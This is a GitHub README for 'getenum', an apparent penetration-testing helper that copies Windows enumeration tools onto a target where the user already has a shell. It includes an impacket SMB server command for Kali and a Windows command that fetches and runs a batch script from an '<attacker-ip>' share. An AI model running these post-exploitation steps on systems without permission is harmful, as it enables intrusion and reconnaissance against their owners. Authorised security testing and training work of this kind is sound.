Skip to content

usafitz/getenum

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 

Repository files navigation

getenum

Windows - upload enumeration tools to target
NOTE: tools are current a/o 26 April 2022

AMMEND AS APPROPRIATE FOR YOUR NEEDS...


USAGE

USE OF THIS TOOL ASSUMES SHELL ACCESS ON A TARGET WINDOWS MACHINE

# ON KALI
impacket-smbserver -smb2support share GetEnumFiles

# ON TARGET WINDOWS SHELL
mkdir c:\tmp
cd c:;\tmp

copy \\<attacker-ip>\share\getenum.bat

.\getenum.bat attacker-ip



HAPPENINGS

THE BATCH SCRIPT WILL CREATE C:\tmp\Enum
... WILL USE SMB TO COPY FILES TO WINDOWS
... USE README.txt (in Enum) TO SEE COMMANDS

DISCLAIMER

All tools included in this repo are intended for learning purposes only and are to only be used on target systems with permission of the system owner.

About

Windows - upload enumeration tools to target

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published